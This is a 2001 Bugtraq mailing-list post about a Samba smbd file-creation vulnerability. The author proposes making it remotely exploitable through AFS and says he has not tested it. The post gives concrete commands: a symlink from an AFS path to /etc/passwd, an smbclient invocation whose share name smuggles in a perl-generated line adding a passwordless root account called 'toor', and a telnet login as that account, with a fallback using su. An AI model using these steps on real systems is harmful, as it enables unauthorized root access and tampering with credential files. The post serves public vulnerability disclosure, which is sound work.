Re: smbd remote file creation vulnerability
daemon@ATHENA.MIT.EDU (Christopher William Palow)
Mon Jul 2 17:22:05 2001
Date: Mon, 2 Jul 2001 11:15:29 -0400 (EDT)
From: Christopher William Palow <cwp@andrew.cmu.edu>
To: bugtraq@securityfocus.com
Message-ID: <Pine.LNX.4.21L-021.0107021108330.1654-100000@unix45.andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
I was hoping to test this out but haven't been able to, so here goes on
theoretical...
How to make this exploit a remote one using AFS or other remote file
systems.
What does this exploit need on the remote side? A
symlink; so... on an AFS system, preferably one of a well-known node that
most AFS servers would have in their CellServDB such as
andrew.cmu.edu or athena.mit.edu, create a symlink to /etc/passwd named
x.log like
ln -s /etc/passwd /afs/andrew.cmu.edu/usr/<username>/x.log
Now make the symlink world readable... then all you need is UNIXes running
samba in the vulnerable configuration and running AFS.
smbclient //afs.machine/"`perl -e '{print "\ntoor::0:0::/:/bin/sh\n"}'`" \
-n ../../../afs/andrew.cmu.edu/usr/<username>/x -N
telnet afs.machine
login as toor
If root logins aren't allowed, make a dummy account first, login with that,
then make a toor account on top of that and su over to toor.
What machines does this really affect? Those running samba and AFS,
mainly educational institutions or other large institutions.
Christopher Palow
palow@cmu.edu
Senior Electrical and Computer Engineering
Carnegie Mellon University